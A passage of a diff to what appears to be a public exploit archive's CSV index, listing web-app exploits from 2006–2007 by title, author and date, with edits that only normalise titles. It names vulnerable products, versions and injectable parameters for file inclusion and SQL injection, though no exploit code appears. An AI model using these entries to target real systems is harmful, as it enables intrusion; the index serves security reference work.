Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0 @@ -17819,18 +17820,18 @@ id,file,description,date,author,platform,type,port 2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - 'extract()' Authentication Bypass / Shell Injection",2006-12-19,rgod,php,webapps,0 2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 -2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 +2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusions",2006-12-19,nuffsaid,php,webapps,0 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - 'archive.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - 'statistic.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 -2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusion",2006-12-20,mdx,php,webapps,0 +2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,php,webapps,0 2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - 'config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,php,webapps,0 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - 'htm2PHP.php' File Disclosure",2006-12-21,"the master",php,webapps,0 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 -2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 +2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusions",2006-12-21,nuffsaid,php,webapps,0 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - 'inertianews_main.php' Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 @@ -17858,14 +17859,14 @@ id,file,description,date,author,platform,type,port 3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - (agent) SQL Injection",2006-12-24,ajann,asp,webapps,0 3002,platforms/php/webapps/3002.php,"HLStats 1.34 - 'hlstats.php' SQL Injection",2006-12-25,"Michael Brooks",php,webapps,0 -3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps,0 3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - 'mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - 'admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 -3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusions",2006-12-25,nuffsaid,php,webapps,0 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 -3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0 @@ -17875,9 +17876,9 @@ id,file,description,date,author,platform,type,port 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - 'admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Parameter Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.phppath' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - 'bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 -3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 +3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusions",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php popen()' Remote Injection",2006-12-27,rgod,php,webapps,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - 'faqDsp.asp catcode' SQL Injection",2006-12-28,ajann,asp,webapps,0 @@ -17898,32 +17899,32 @@ id,file,description,date,author,platform,type,port 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution",2006-12-31,Kacper,php,webapps,0 -3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 +3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - 'bu_dir' Multiple Remote File Inclusions",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 -3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id' Parameter SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 +3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp?id' SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 3062,platforms/asp/webapps/3062.txt,"AutoDealer 2.0 - 'detail.asp iPro' SQL Injection",2007-01-01,ajann,asp,webapps,0 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - 'Customize.asp' Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection",2007-01-03,ajann,asp,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - 'language.php' Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - 'inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 +3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php?id' SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3089,platforms/asp/webapps/3089.txt,"Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 -3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0 +3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusions",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0 -3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0 +3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Remote File Inclusion",2007-01-07,beks,php,webapps,0 3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 SQL Injection",2007-01-07,"Stefan Esser",php,webapps,0 3096,platforms/php/webapps/3096.txt,"AllMyLinks 0.5.0 - 'index.php' Remote File Inclusion",2007-01-07,GoLd_M,php,webapps,0 3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 - 'index.php' Remote File Inclusion",2007-01-07,bd0rk,php,webapps,0 3100,platforms/php/webapps/3100.txt,"Magic Photo Storage Website - '_config[site_path]' File Inclusion",2007-01-08,k1tk4t,php,webapps,0 3103,platforms/php/webapps/3103.php,"@lex Guestbook 4.0.2 - Remote Command Execution",2007-01-08,DarkFig,php,webapps,0 -3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - 'INC' Multiple Remote File Inclusions",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 3106,platforms/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,php,webapps,0 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,php,webapps,0 @@ -17936,13 +17937,13 @@ id,file,description,date,author,platform,type,port 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - 'i-accueil.php chemin' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - 'duyuru.asp id' SQL Injection",2007-01-12,chernobiLe,php,webapps,0 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 -3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' Parameter SQL Injection",2007-01-13,ajann,asp,webapps,0 +3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' SQL Injection",2007-01-13,ajann,asp,webapps,0 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3134,platforms/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php id' Parameter SQL Injection",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php?id' SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2/2.3.6 - 'search.php' SQL Injection (2)",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - 'mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 @@ -18033,7 +18034,7 @@ id,file,description,date,author,platform,type,port 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - 'index_album.php' Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,php,webapps,0 -3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0 +3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Remote File Inclusion",2007-02-07,Denven,php,webapps,0 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - 'index.php projectid' SQL Injection",2007-02-08,ajann,php,webapps,0 3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0 @@ -18112,7 +18113,7 @@ id,file,description,date,author,platform,type,port 3436,platforms/php/webapps/3436.txt,"WEBO (Web ORGanizer) 1.0 - 'baseDir' Remote File Inclusion",2007-03-08,K-159,php,webapps,0 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - 'mysave.php' Remote File Inclusion",2007-03-08,DNX,php,webapps,0 -3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusion",2007-03-09,K-159,php,webapps,0 +3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,php,webapps,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - Security Bypass / SQL Injection / Cross-Site Scripting",2007-03-09,Omni,php,webapps,0 3448,platforms/php/webapps/3448.txt,"work system E-Commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - 'index.php ID' SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 @@ -18124,7 +18125,7 @@ id,file,description,date,author,platform,type,port 3458,platforms/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",2007-03-11,"BorN To K!LL",php,webapps,0 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 -3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' Parameter SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 +3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp id' SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 @@ -18133,14 +18134,14 @@ id,file,description,date,author,platform,type,port 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0 -3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' Parameter SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 +3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - Remote Authentication Bypass",2007-03-15,WiLdBoY,asp,webapps,0 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - 'usergroups.php' SQL Injection",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 -3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 +3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",php,webapps,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 @@ -18176,15 +18177,15 @@ id,file,description,date,author,platform,type,port 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - 'module.php' Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 -3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' Parameter SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 +3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - 'idnews' SQL Injection",2007-03-22,"Mehmet Ince",php,webapps,0 3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps,0 -3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' Parameter SQL Injection",2007-03-22,parad0x,asp,webapps,0 +3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' SQL Injection",2007-03-22,parad0x,asp,webapps,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 -3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' Parameter SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 @@ -18217,7 +18218,7 @@ id,file,description,date,author,platform,type,port 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - 'inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps,0 3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php cat' SQL Injection",2007-03-29,Kacper,php,webapps,0 -3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Inclusion",2007-03-29,"ThE dE@Th",php,webapps,0 +3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - 'install_root' Multiple Remote File Inclusions",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3611,platforms/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,php,webapps,0 @@ -18235,7 +18236,7 @@ id,file,description,date,author,platform,type,port 3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0 3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - 'camid' SQL Injection",2007-04-01,ajann,php,webapps,0 3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection",2007-04-01,ajann,php,webapps,0 -3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 +3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps,0 3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0 @@ -18250,14 +18251,14 @@ id,file,description,date,author,platform,type,port 3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - 'xmlrpc' SQL Injection",2007-04-03,"Sumit Siddharth",php,webapps,0 3657,platforms/php/webapps/3657.txt,"MySpeach 3.0.7 - Local/Remote File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion",2007-04-04,frog-m@n,php,webapps,0 -3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion",2007-04-04,kezzap66345,php,webapps,0 +3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusions",2007-04-04,kezzap66345,php,webapps,0 3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 - (script_path) Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3663,platforms/php/webapps/3663.htm,"XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection",2007-04-04,ajann,php,webapps,0 3665,platforms/php/webapps/3665.htm,"Mutant 0.9.2 - 'mutant_functions.php' Remote File Inclusion",2007-04-04,bd0rk,php,webapps,0 3666,platforms/php/webapps/3666.pl,"XOOPS Module Rha7 Downloads 1.0 - 'visit.php' SQL Injection",2007-04-04,ajann,php,webapps,0 -3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Parameter Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 +3667,platforms/php/webapps/3667.txt,"Sisplet CMS 05.10 - 'site_path' Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse - (site_path) Remote File Inclusion",2007-04-05,kezzap66345,php,webapps,0 -3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusion",2007-04-05,bd0rk,php,webapps,0 +3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 Beta - Multiple Remote File Inclusions",2007-04-05,bd0rk,php,webapps,0 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links 1.03 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs 2.4 - 'cid' SQL Injection",2007-04-05,ajann,php,webapps,0 @@ -18287,12 +18288,12 @@ id,file,description,date,author,platform,type,port 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a - 'absolute_path' Remote File Inclusion",2007-04-11,"Cold Zero",php,webapps,0 3710,platforms/php/webapps/3710.php,"PunBB 1.2.14 - Remote Code 